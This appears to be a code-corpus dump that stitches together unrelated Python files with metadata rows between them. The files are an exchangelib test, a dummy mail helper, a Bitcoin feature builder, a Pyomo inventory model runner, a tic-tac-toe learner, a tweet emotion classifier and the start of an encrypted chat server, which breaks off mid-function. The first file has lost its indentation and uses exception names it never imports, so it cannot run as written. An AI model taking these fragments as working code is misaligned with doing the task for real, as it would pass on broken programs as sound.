from exchangelib.properties import EWSElement
from .common import EWSTest
class CommonTest(EWSTest):
def test_magic(self):
self.assertIn(self.account.protocol.version.api_version, str(self.account.protocol))
self.assertIn(self.account.protocol.credentials.username, str(self.account.protocol.credentials))
self.assertIn(self.account.primary_smtp_address, str(self.account))
self.assertIn(str(self.account.version.build.major_version), repr(self.account.version))
for item in (
self.account.protocol,
self.account.version,
):
with self.subTest(item=item):
# Just test that these at least don't throw errors
repr(item)
str(item)
for attr in (
"admin_audit_logs",
"archive_deleted_items",
"archive_inbox",
"archive_msg_folder_root",
"archive_recoverable_items_deletions",
"archive_recoverable_items_purges",
"archive_recoverable_items_root",
"archive_recoverable_items_versions",
"archive_root",
"calendar",
"conflicts",
"contacts",
"conversation_history",
"directory",
"drafts",
"favorites",
"im_contact_list",
"inbox",
"journal",
"junk",
"local_failures",
"msg_folder_root",
"my_contacts",
"notes",
"outbox",
"people_connect",
"public_folders_root",
"quick_contacts",
"recipient_cache",
"recoverable_items_deletions",
"recoverable_items_purges",
"recoverable_items_root",
"recoverable_items_versions",
"search_folders",
"sent",
"server_failures",
"sync_issues",
"tasks",
"todo_search",
"trash",
"voice_mail",
):
with self.subTest(attr=attr):
# Test distinguished folder shortcuts. Some may raise ErrorAccessDenied
try:
item = getattr(self.account, attr)
except (
ErrorAccessDenied,
ErrorFolderNotFound,
ErrorItemNotFound,
ErrorInvalidOperation,
ErrorNoPublicFolderReplicaAvailable,
):
continue
else:
repr(item)
str(item)
self.assertTrue(item.is_distinguished)
def test_from_xml(self):
# Test for all EWSElement classes that they handle None as input to from_xml()
import exchangelib
for mod in (
exchangelib.attachments,
exchangelib.extended_properties,
exchangelib.indexed_properties,
exchangelib.folders,
exchangelib.items,
exchangelib.properties,
):
for k, v in vars(mod).items():
with self.subTest(k=k, v=v):
if type(v) is not type:
continue
if not issubclass(v, EWSElement):
continue
# from_xml() does not support None input
with self.assertRaises(Exception):
v.from_xml(elem=None, account=None)
| 34.287037 | 105 | 0.533081 | 3,451 | 0.931947 | 0 | 0 | 0 | 0 | 0 | 0 | 924 | 0.249527 |
1fdb3bda49808628500a9864a821b84e3138f89c
| 735 |
py
|
Python
|
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | 4 |
2021-04-04T23:19:06.000Z
|
2021-04-10T21:32:23.000Z
|
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | null | null | null |
{{cookiecutter.project_slug}}/app/utils/mail.py
|
Bexils/fastapi-project-template
|
1d6937c5adce7603c77e01f8560032082392fdbd
|
[
"MIT"
] | null | null | null |
import os
from datetime import datetime
from pathlib import Path
from pydantic import EmailStr
def send_dummy_mail(subject: str, message: str, to: EmailStr):
current_path = os.getcwd()
filename = f'{datetime.now().timestamp()} - {subject}.txt'
email_text = f'''Subject: {subject}
From: [email protected]
To: {to}
{message}
'''
email_path = Path(os.path.join(current_path, 'emails'))
emails_file = os.path.join(current_path, 'emails', filename)
try:
with open(emails_file, 'w') as file_obj:
file_obj.write(email_text)
except FileNotFoundError:
email_path.mkdir()
with open(emails_file, 'w') as file_obj:
file_obj.write(email_text)
return 'email sent!'
| 28.269231 | 64 | 0.672109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.208163 |
1fded2389baa0f710851c0214c487f38445e67b1
| 3,540 |
py
|
Python
|
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | 6 |
2018-03-11T13:47:22.000Z
|
2018-07-03T05:03:48.000Z
|
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | null | null | null |
predict_btc_future.py
|
benjaminshi02003220/Bitcoin_price_prediction
|
f4894614bafa0a4295d08d0b8f53d314c4262724
|
[
"MIT"
] | 4 |
2018-03-27T15:38:40.000Z
|
2018-07-07T20:04:29.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 9 17:06:09 2018
@author: v-beshi
"""
import pyodbc
import pandas as pd
def get_agg_data():
con=pyodbc.connect('DRIVER={SQL Server};SERVER=ServerName;DATABASE=DB;UID=ID;PWD=Password')
raw_data=pd.read_sql('select * from dbo.BitcoinTradeHistory',con)
raw_data['USDT_exceed']=raw_data['huobi_USDT']-raw_data['exchange_rate']
pre_price15=[]
for i in range(0,15):
pre_price15.append(0)
for i in range(15,len(raw_data)):
pre_price15.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-15])/(raw_data['ok0330'][i-15]))
pre_price15=pd.Series(pre_price15,name='pre_price15')
pre_price10=[]
for i in range(0,10):
pre_price10.append(0)
for i in range(10,len(raw_data)):
pre_price10.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-10])/(raw_data['ok0330'][i-10]))
pre_price10=pd.Series(pre_price10,name='pre_price10')
pre_price5=[]
for i in range(0,5):
pre_price5.append(0)
for i in range(5,len(raw_data)):
pre_price5.append((raw_data['ok0330'][i]-raw_data['ok0330'][i-5])/(raw_data['ok0330'][i-5]))
pre_price5=pd.Series(pre_price5,name='pre_price5')
next_price5=[]
for i in range(0,len(raw_data)-5):
if (raw_data['ok0330'][i+5]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price5.append(1)
else:
next_price5.append(0)
for i in range(0,5):
next_price5.append(0)
next_price5=pd.Series(next_price5,name='next_price5')
next_price10=[]
for i in range(0,len(raw_data)-10):
if (raw_data['ok0330'][i+10]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price10.append(1)
else:
next_price10.append(0)
for i in range(0,10):
next_price10.append(0)
next_price10=pd.Series(next_price10,name='next_price10')
next_price15=[]
for i in range(0,len(raw_data)-15):
if (raw_data['ok0330'][i+15]-raw_data['ok0330'][i])/(raw_data['ok0330'][i])>0:
next_price15.append(1)
else:
next_price15.append(0)
for i in range(0,15):
next_price15.append(0)
next_price15=pd.Series(next_price15,name='next_price15')
pre_bfx=[0]
for i in range(1,len(raw_data)):
pre_bfx.append((raw_data['bfx_last_price'][i]-raw_data['bfx_last_price'][i-1])/(raw_data['bfx_last_price'][i-1]))
pre_bfx=pd.Series(pre_bfx,name='pre_bfx')
pre_news10=[]
for i in range(0,10):
pre_news10.append(0)
for i in range(10,len(raw_data)):
pre_news10.append((raw_data['news_emotion'][i]-raw_data['news_emotion'][i-10])/(raw_data['news_emotion'][i-10]))
pre_news10=pd.Series(pre_news10,name='pre_news10')
raw_data['bids_wall']=raw_data['bfx_bids_wall']/100
raw_data['asks_wall']=raw_data['bfx_asks_wall']/100
raw_data['total_bids']=raw_data['bfx_total_bids']/100
raw_data['total_asks']=raw_data['bfx_total_asks']/100
raw_data['buy_volumn']=raw_data['bfx_buy_volumn']/50
raw_data['sell_volumn']=raw_data['bfx_sell_volumn']/50
raw_data=raw_data.drop(['ok0330','DateTime','ok_thisweek','huobi_USDT','exchange_rate','bfx_last_price','news_emotion','bfx_bids_wall','bfx_asks_wall','bfx_total_bids','bfx_total_asks','bfx_buy_volumn','bfx_sell_volumn'],axis=1)
agg_data=pd.concat([raw_data,pre_price15,pre_price10,pre_price5,pre_bfx,pre_news10,next_price5,next_price10,next_price15],axis=1)
agg_data=agg_data[15:len(agg_data)-15]
return(agg_data)
| 38.478261 | 232 | 0.664124 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 917 | 0.25904 |
1fe22fd049d8e5e23653953f62233abe237a47e8
| 16,692 |
py
|
Python
|
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
bloodbank_rl/pyomo_models/stochastic_model_runner.py
|
joefarrington/bloodbank_rl
|
f285581145034b498f01c9b44f95437ceddb042a
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import pyomo.environ as pyo
import mpisppy.utils.sputils as sputils
from mpisppy.opt.ef import ExtensiveForm
from pathlib import Path
import os
import sys
path_root = Path(os.path.abspath(__file__)).parents[2]
sys.path.append(str(path_root))
from bloodbank_rl.environments.platelet_bankSR import PoissonDemandProviderSR
import bloodbank_rl.pyomo_models.model_constructors as pyomo_mc
class PyomoModelRunner:
def __init__(
self,
model_constructor,
model_constructor_params,
n_scenarios,
demand_provider,
demand_provider_kwargs=None,
scenario_name_start=0, # Used this as starting seed for Pyomo experiments with sim data
solver_string="gurobi_persistent",
solver_options={"LogFile": "gurobi.log", "OutputFlag": 1, "LogToConsole": 0},
log=None,
):
self.model_constructor = model_constructor
self.model_constructor_params = model_constructor_params
self.n_scenarios = n_scenarios
self.demand_provider = demand_provider
self.demand_provider_kwargs = demand_provider_kwargs
self.scenario_name_start = scenario_name_start
self.solver_string = solver_string
self.solver_options = solver_options
self.all_scenario_names = [
f"{i+self.scenario_name_start}" for i in range(0, self.n_scenarios)
]
self.checks_to_perform = self._determine_checks_to_perform()
self.log = log
def scenario_creator(self, scenario_name):
if self.demand_provider_kwargs:
prov = self.demand_provider(
**self.demand_provider_kwargs, seed=int(scenario_name)
)
else:
prov = self.demand_provider(seed=int(scenario_name))
prov.reset()
demand = {
t: prov.generate_demand()
for t in range(1, self.model_constructor_params["t_max"] + 1)
}
model = self.model_constructor(
demand=demand, **self.model_constructor_params
).build_model()
# Telling it which decisions belong to first stage - for us this could be all our policy parameters
# because we can't change them during a trajectory
first_stage_params = self._get_first_stage_decision_params(model)
sputils.attach_root_node(model, 0, first_stage_params)
# If we don't specify, assume that all equally likely
model._mpisppy_probability = 1.0 / self.n_scenarios
return model
def _get_first_stage_decision_params(self, model):
if self.model_constructor.policy_parameters() == ["s", "S"]:
return [model.s, model.S]
elif self.model_constructor.policy_parameters() == ["s", "Q"]:
return [model.s, model.Q]
elif self.model_constructor.policy_parameters() == ["s", "S", "alpha", "Q"]:
return [model.s, model.S, model.alpha, model.Q]
elif self.model_constructor.policy_parameters() == ["s", "S", "beta", "Q"]:
return [model.s, model.S, model.beta, model.Q]
elif self.model_constructor.policy_parameters() == ["S"]:
return [model.S]
else:
raise ValueError("Policy parameters not recognised")
def solve_program(self):
options = {"solver": self.solver_string}
self.ef = ExtensiveForm(
options=options,
all_scenario_names=self.all_scenario_names,
scenario_creator=self.scenario_creator,
)
self.results = self.ef.solve_extensive_form(solver_options=self.solver_options)
objval = self.ef.get_objective_value()
return objval
def construct_results_dfs(self):
self.results_list = []
self.costs_df = pd.DataFrame(
columns=[
"Seed",
"Variable cost",
"Holding cost",
"Fixed cost",
"Wastage cost",
"Shortage cost",
]
)
for tup in self.ef.scenarios():
scen = tup[0]
if self.demand_provider_kwargs:
prov = self.demand_provider(
**self.demand_provider_kwargs, seed=int(scen)
)
else:
prov = self.demand_provider(seed=int(scen))
prov.reset()
demand = {
t: prov.generate_demand()
for t in range(1, self.model_constructor_params["t_max"] + 1)
}
model = tup[1]
# Add common variables to output
res_dicts = [
{
"opening_inventory": [
round(model.IssB[t, a](), 0) for a in model.A
],
"received": [round(model.X[t, a](), 0) for a in model.A],
"demand": round(demand[t], 0),
"DSSR": [round(model.DssR[t, a](), 0) for a in model.A],
"wastage": round(model.W[t](), 0),
"shortage": round(model.E[t](), 0),
"closing inventory": [
round(model.IssE[t, a](), 0) for a in model.A
],
"inventory position": round(model.IP[t](), 0),
"order quantity": round(model.OQ[t](), 0),
}
for t in model.T
]
# Add policy paramters to results
for res_dict, t in zip(res_dicts, model.T):
for param in self.model_constructor.policy_parameters():
if self.model_constructor_params["weekly_policy"]:
param_string = f"model.{param}[(t-1) % 7]()"
else:
param_string = f"model.{param}[t]()"
res_dict[f"{param}"] = round(eval(param_string), 0)
self.results_list.append(pd.DataFrame(res_dicts))
# Record the costs for each scenario and store in a single Pandas DataFrame
scen_costs_dict = {
"Seed": scen,
"Variable cost": round(model.variable_cost(), 0),
"Holding cost": round(model.holding_cost(), 0),
"Fixed cost": round(model.fixed_cost(), 0),
"Wastage cost": round(model.wastage_cost(), 0),
"Shortage cost": round(model.shortage_cost(), 0),
}
self.costs_df = self.costs_df.append(scen_costs_dict, ignore_index=True)
if self.log is not None:
self.log.info(f"##### Scenario {scen} #####")
self.log.info(f"Variable cost: {round(model.variable_cost(),0)}")
self.log.info(f"Holding cost: {round(model.holding_cost(),0)}")
self.log.info(f"Fixed cost: {round(model.fixed_cost(),0)}")
self.log.info(f"Wastage cost: {round(model.wastage_cost(),0)}")
self.log.info(f"Shortage cost: {round(model.shortage_cost(),0)}")
else:
print(f"##### Scenario {scen} #####")
# For now, also print the costs as useful for debugging
print(f"Variable cost: {round(model.variable_cost(),0)}")
print(f"Holding cost: {round(model.holding_cost(),0)}")
print(f"Fixed cost: {round(model.fixed_cost(),0)}")
print(f"Wastage cost: {round(model.wastage_cost(),0)}")
print(f"Shortage cost: {round(model.shortage_cost(),0)}")
def save_results(self, directory_path_string):
for scen, df in zip(self.all_scenario_names, self.results_list):
filename = Path(directory_path_string) / f"scenario_{scen}_output.csv"
df.to_csv(filename)
filename = Path(directory_path_string) / f"all_costs.csv"
self.costs_df.to_csv(filename)
def check_outputs(self, directory_path_string):
self.results_of_checks_list = []
for scen, scenario_df in zip(self.all_scenario_names, self.results_list):
# Ensure that entries in columns with array values are numpy arrays
array_cols = ["opening_inventory", "received", "DSSR", "closing inventory"]
for col in array_cols:
scenario_df[f"{col}"] = scenario_df[f"{col}"].apply(
lambda x: np.array(x)
)
# Do a merge to easily run checks where we look at consecutive rows
merged_results = pd.concat(
[
scenario_df,
scenario_df.loc[:, ["opening_inventory", "received"]]
.shift(-1)
.add_prefix("next_"),
],
axis=1,
)
# Run the necessary checks
out_df = pd.DataFrame()
for f in self.checks_to_perform:
res = merged_results.apply(f, axis=1)
out_df = pd.concat([out_df, res], axis=1)
# Print the number of rows with failure and store
# the results if any failures for a scenario
fail_check_rows = out_df[~out_df.all(axis=1)]
n_rows_with_fail = fail_check_rows.shape[0]
if self.log is not None:
self.log.info(
f"Scenario {scen}: {n_rows_with_fail} rows with a failed check"
)
else:
print(f"Scenario {scen}: {n_rows_with_fail} rows with a failed check")
if n_rows_with_fail > 0:
filename = Path(directory_path_string) / f"scenario_{scen}_checks.csv"
out_df.to_csv(filename)
self.results_of_checks_list.append(out_df)
### Functions for checking the output is consistent with constraints ###
# TODO: Could run a check that policy params same in each scenario
def _determine_checks_to_perform(self):
checks_to_run = [
self._check_wastage,
self._check_shortage,
self._check_inventory_during_day,
self._check_no_max_age_opening_inventory,
self._check_close_to_next_open_inventory,
self._check_order_to_next_received,
]
if self.model_constructor.policy_parameters() == ["s", "S"]:
return checks_to_run + [self._check_sS]
elif self.model_constructor.policy_parameters() == ["s", "Q"]:
return checks_to_run + [self._check_sQ]
elif self.model_constructor.policy_parameters() == ["s", "S", "alpha", "Q"]:
return checks_to_run + [self._check_sSaQ]
elif self.model_constructor.policy_parameters() == ["s", "S", "beta", "Q"]:
return checks_to_run + [self._check_sSbQ]
elif self.model_constructor.policy_parameters() == ["S"]:
return checks_to_run + [self._check_S]
else:
raise ValueError("Policy parameters not recognised")
# High level wastage check
def _check_wastage(self, row):
return pd.Series(
{
"check_wastage": row["wastage"]
== max(
0, row["opening_inventory"][0] + row["received"][0] - row["demand"]
)
}
)
# High level shortage check
def _check_shortage(self, row):
return pd.Series(
{
"check_shortage": row["shortage"]
== max(
0,
row["demand"]
- row["opening_inventory"].sum()
- row["received"].sum(),
)
}
)
# Check closing inventory
def _calculate_remaining_stock_and_demand(self, row):
total_remaining_demand = row["demand"]
inventory = row["opening_inventory"] + row["received"]
remaining_demand = np.zeros_like(inventory)
for idx, stock in enumerate(inventory):
demand_filled = min(total_remaining_demand, stock)
remaining_stock = stock - demand_filled
total_remaining_demand = total_remaining_demand - demand_filled
inventory[idx] = remaining_stock
remaining_demand[idx] = total_remaining_demand
return inventory, remaining_demand
def _check_inventory_during_day(self, row):
(
calc_closing_inventory,
calc_remaining_demand,
) = self._calculate_remaining_stock_and_demand(row)
return pd.Series(
{
"check_closing_inventory": (
row["closing inventory"] == calc_closing_inventory
).all(),
"check_DSSR": (row["DSSR"] == calc_remaining_demand).all(),
"check_inventory_position": row["inventory position"]
== row["closing inventory"][1:].sum(),
}
)
def _check_no_max_age_opening_inventory(self, row):
return pd.Series(
{"check_no_max_age_opening_inventory": row["opening_inventory"][-1] == 0}
)
def _check_close_to_next_open_inventory(self, row):
if row["next_opening_inventory"] is np.nan:
return pd.Series({"check_close_to_next_open_inventory": None})
else:
return pd.Series(
{
"check_close_to_next_open_inventory": (
row["closing inventory"][1:]
== row["next_opening_inventory"][:-1]
).all()
}
)
def _check_order_to_next_received(self, row):
if row["next_received"] is np.nan:
return pd.Series({"check_order_to_next_received": None})
else:
return pd.Series(
{
"check_order_to_next_received": row["order quantity"]
== row["next_received"].sum()
}
)
def _check_sS(self, row):
S_gt_s = row["S"] >= row["s"] + 1
if row["inventory position"] < row["s"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{
"check_sS_S_gt_s": S_gt_s,
"check_sS_order_quantity_to_params": order_quantity_to_params,
}
)
def _check_S(self, row):
if row["inventory position"] < row["S"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{"check_S_order_quantity_to_params": order_quantity_to_params,}
)
def _check_sQ(self, row):
if row["inventory position"] < row["s"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{"check_sQ_order_quantity_to_params": order_quantity_to_params}
)
def _check_sSaQ(self, row):
S_gt_s = row["S"] >= row["s"] + 1
s_gt_a = row["s"] >= row["alpha"] + 1
if row["inventory position"] < row["alpha"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
elif row["inventory position"] < row["s"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{
"check_sSaQ_S_gt_s": S_gt_s,
"check_sSaQ_s_gt_a": s_gt_a,
"check_sSaQ_order_quantity_to_params": order_quantity_to_params,
}
)
def _check_sSbQ(self, row):
S_gt_s = row["S"] >= row["s"] + 1
s_gt_b = row["s"] >= row["beta"] + 1
if row["inventory position"] < row["beta"]:
order_quantity_to_params = row["order quantity"] == row["Q"]
elif row["inventory position"] < row["s"]:
order_quantity_to_params = (
row["order quantity"] == row["S"] - row["inventory position"]
)
else:
order_quantity_to_params = row["order quantity"] == 0
return pd.Series(
{
"check_sSbQ_S_gt_s": S_gt_s,
"check_sSbQ_s_gt_b": s_gt_b,
"check_sSbQ_order_quantity_to_params": order_quantity_to_params,
}
)
| 37.679458 | 107 | 0.557453 | 16,262 | 0.974239 | 0 | 0 | 0 | 0 | 0 | 0 | 3,756 | 0.225018 |
1fe41f5dc40be297773f566df8109a75b70ca3b8
| 3,623 |
py
|
Python
|
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
ch1/tictactoe.py
|
T0nyX1ang/Reinforcement-Learning
|
a86ab92ee628b95c7dbe432c079b7ce04b5e982a
|
[
"MIT"
] | null | null | null |
import random
import json
class TTTGame(object):
def __init__(self):
self._board = [0] * 9
self._end = False
with open('learning.json', 'r') as f:
self._state = json.loads(f.read())
self._alpha = 0.05
def judge(self, state):
if (sum(state[0: 3]) == 3 or \
sum(state[3: 6]) == 3 or \
sum(state[6::]) == 3 or \
sum(state[0::3]) == 3 or \
sum(state[1::3]) == 3 or \
sum(state[2::3]) == 3 or \
sum(state[0::4]) == 3 or \
sum(state[2:7:2]) == 3):
self._end = True
return 1
elif (sum(state[0: 3]) == -3 or \
sum(state[3: 6]) == -3 or \
sum(state[6::]) == -3 or \
sum(state[0::3]) == -3 or \
sum(state[1::3]) == -3 or \
sum(state[2::3]) == -3 or \
sum(state[0::4]) == -3 or \
sum(state[2:7:2]) == -3):
self._end = True
return 0
elif 0 not in state:
self._end = True
return 0.5 # can be set to 0 if you need sharper winning criterion.
else:
self._end = False
if str(state) not in self._state:
self._state[str(state)] = 0.5 # move state
return self._state[str(state)] # study starts from here ...
def random_move(self, move_type=-1):
self.judge(self._board)
if (self._end):
return '[End]'
empty = []
count = 0
for val in self._board:
if (val == 0):
empty.append(count)
count += 1
select = empty[random.randint(0, len(empty) - 1)]
move_board = self._board.copy()
move_board[select] = move_type
value = self.judge(move_board)
self._state[str(self._board)] = self._state[str(self._board)] + self._alpha * (value - self._state[str(self._board)]) # update move
self._board = move_board.copy()
return select
def greedy_move(self, move_type=1):
self.judge(self._board)
if (self._end):
return '[End]'
selects = []
max_value = -1
count = 0
for val in self._board:
if (val == 0):
move_board = self._board.copy()
move_board[count] = move_type
value = self.judge(move_board)
if (value > max_value):
selects = [count]
max_value = value
elif (value == max_value):
selects.append(count)
count += 1
select = random.sample(selects, 1)[0]
move_board = self._board.copy()
move_board[select] = move_type
value = self.judge(move_board)
self._state[str(self._board)] = self._state[str(self._board)] + self._alpha * (value - self._state[str(self._board)]) # update move
self._board = move_board.copy()
return select
def play(self):
self._board = [0] * 9
self._end = False
while not self._end:
s1 = self.greedy_move()
s2 = self.random_move()
# print('greedy selection:', s1, 'random selection:', s2)
def train(self, epoch=1000):
for i in range(0, epoch):
self.play()
def dump_state(self):
with open('learning.json', 'w') as f:
f.write(json.dumps(self._state))
def pretty_print_board(self):
print(self._board[0], self._board[1], self._board[2])
print(self._board[3], self._board[4], self._board[5])
print(self._board[6], self._board[7], self._board[8])
def combat(self):
self._board = [0] * 9
self._end = False
while not self._end:
s1 = self.greedy_move()
self.pretty_print_board()
print("Winning prob:", self.judge(self._board))
if (self._end):
print('You lose / a tie!')
break
s2 = input('Please enter your move: ')
while self._board[int(s2)] != 0:
s2 = input('Please enter your move: ')
self._board[int(s2)] = -1
self.pretty_print_board()
print("Winning prob:", self.judge(self._board))
self.judge(self._board)
if (self._end):
print('You win!')
if __name__ == '__main__':
tttg = TTTGame()
tttg.combat()
tttg.train(100000)
tttg.dump_state()
| 27.037313 | 134 | 0.619928 | 3,493 | 0.964118 | 0 | 0 | 0 | 0 | 0 | 0 | 352 | 0.097157 |
1fe4750a23a26455a9111641d38426011cdda650
| 141 |
py
|
Python
|
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
Chapter 03/ch3_1_38.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
|
f6a4194684515495d00aa38347a725dd08f39a0c
|
[
"MIT"
] | null | null | null |
str1 = ' Happy Life '
str2= ' Happy Life '
if (str1.strip()== str2.strip()):
print("Same")
else:
print("Not same")
# same
| 17.625 | 34 | 0.531915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55 | 0.390071 |
1fe4a5c508f25892277d20cf17891a3088bcee69
| 2,601 |
py
|
Python
|
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | null | null | null |
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | 1 |
2020-03-28T16:06:04.000Z
|
2020-03-29T02:03:44.000Z
|
text_analytic_emotion_load_only.py
|
agussuarjaya/Text_Analytic_-Emotion-
|
01cdf6f3661eaad2cb76111ebaee90ec50b592f0
|
[
"MIT"
] | 2 |
2020-03-28T15:02:48.000Z
|
2020-03-29T12:27:50.000Z
|
# -*- coding: utf-8 -*-
"""Text Analytic (Emotion) - load_only.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ec4JMQZ5zoj-PB_a0mUkJWRKotgQSd9f
"""
"""
Text Analytic (Emotion) with TensorFlow
Copyright 2020 I Made Agus Dwi Suarjaya
Gede Ocha Dipa Ananda
Ni Luh Putu Diah Putri Maheswari
Description : Try to analyze Tweets with TensorFlow and classify into 5 emotions (anger, happiness, sadness, love, fear)
Dataset source : https://raw.githubusercontent.com/meisaputri21/Indonesian-Twitter-Emotion-Dataset/master/Twitter_Emotion_Dataset.csv
"""
#Setup
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
import csv
import time
import ast
import numpy as np
import pandas as pd
#--------------------------------------------------------------------------------------------------------------------------
model_path = './1585378332_model'
encoder_path = './1585378332_encoder'
dict_path = './1585378332_dict'
#--------------------------------------------------------------------------------------------------------------------------
#Load the model (Optional for Transfer Learning)
reloaded_model = tf.keras.models.load_model(model_path)
model = reloaded_model
#Load the encoder (Optional for Transfer Learning)
encoder = tfds.features.text.TokenTextEncoder.load_from_file(encoder_path)
#Load the dictionary (Optional for Transfer Learning)
with open(dict_path) as dict_file:
d = ast.literal_eval(dict_file.readline())
#Classify some tweets with model predict
tweet = []
tweet.append('Tahukah kamu, bahwa saat itu papa memejamkan matanya dan menahan gejolak dan batinnya. Bahwa papa sangat ingin mengikuti keinginanmu tapu lagi-lagi dia HARUS menjagamu?')
tweet.append('[Idm] My, masa gua tadi ketemu tmn SD yg pas SD ngejar gua dan ngasih surat tiap minggunya, asdfghjkl bgt, gk tau knp ngerasa takut gua :v hadeuh jaman SD ngerti apa coba :v')
tweet.append('Sedih bny penulisan resep yg tidak baku sdm, sdt, ruas, sejumput, secukupnya, even biji/buah termasuk tidak baku :(')
tweet.append('Paling nyampah org suka compare kan aku dgn org lain, dia dia ah aku aku ah. Tak suka boleh blah lah -__-')
tweet.append('Agak telat ramai nya ya dok...sudah paham sejak lama banget jadi geli aja baru pada ramai sekarang hehehe...')
for text in range(len(tweet)):
predictions = model.predict(encoder.encode(tweet[text]))
predictions[0]
print(d[np.argmax(predictions[0])], ' <- ', tweet[text])
| 38.820896 | 189 | 0.685506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,886 | 0.725106 |
1fe6e5bdf88233acf9a9c841722eff52d327f1f2
| 13,160 |
py
|
Python
|
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | 2 |
2021-08-30T03:19:10.000Z
|
2021-09-06T21:51:02.000Z
|
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | null | null | null |
Server.py
|
HackintoshwithUbuntu/Python-Chat-App
|
d5af370e33a092c52702efed6b1074d458c593ac
|
[
"MIT"
] | null | null | null |
# Imports
import socket # Communication
import threading # Communication with multiple users at once
import pickle # Serialising data
import hashlib # Hashing passwords
from Crypto.Cipher import AES # AES encryption algorithms
from Crypto.Random import get_random_bytes # For generating random keys and nonces
# A list of codes used in this program to prefix messages, so client knows their meaning
'''
______________________________________
| CODE | MEANING |
|____________________________________|
? | Signup |
! | Signin |
$ | Control |
@ | Direct Message |
^ | Everyone Message |
* | Request list |
+ | New user online |
- | User logged off |
= | Request pics dict |
p | New profile pic |
_____________________________________|
'''
# A dictionary storing usernames and passwords
logins = {}
# dictionary to store corresponding socket to username
record = {}
# dictionary to username to socket
records = {}
# dictionary to store username to server key
keys = {}
# Dictionary storing profile pictures
pics = {}
# List to keep track of socket descriptors
connected_list = []
# A dictionary for working with logins (note: this is just so we can use the data in the file)
loginss = {}
# Starting the server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Note: code skips to end as these function are not used until later
# A custom made function for sending double-layer encyrpted data to clients
def send_to_client(clientsocket, message, key):
# encrypt with our own key, they decrypt with ours
# Serialising message so it can be encrypted
msg = pickle.dumps(message)
# Creating a new cipher
cipher = AES.new(key, AES.MODE_EAX)
# Ciphering the data
# NOTE: WE ARE USING A RANDOMLY GENERATED NONCE, for second layer encryption
ciphered_data, tag = cipher.encrypt_and_digest(msg)
# Packing the data together and serialising it again so it can be sent
tosend = [cipher.nonce, tag, ciphered_data]
tosend = pickle.dumps(tosend)
# Send packaged data
clientsocket.send(tosend)
return
# A custom function to recieve client data, then decrypt, then verify
def client_receive(clientsocket, otherkey):
# Receive data
msg = clientsocket.recv(2048)
# Making sure client hasn't disconnected
if not msg:
return "disconnect"
else:
# Seperating packaged data
msg = pickle.loads(msg)
noonce = msg[0]
tag = msg[1]
data = msg[2]
# Creating cipher for decryption
cipher = AES.new(otherkey, AES.MODE_EAX, noonce)
# Verifying integrity of data using a tag
msg = cipher.decrypt_and_verify(data, tag)
# Deserialising data
msg = pickle.loads(msg)
return msg
# A custom function for sending data to all clients, except sender
def send_all(sender, message):
for i in connected_list:
if i == sender:
continue
# Finding the socket
receiversoc = records[i]
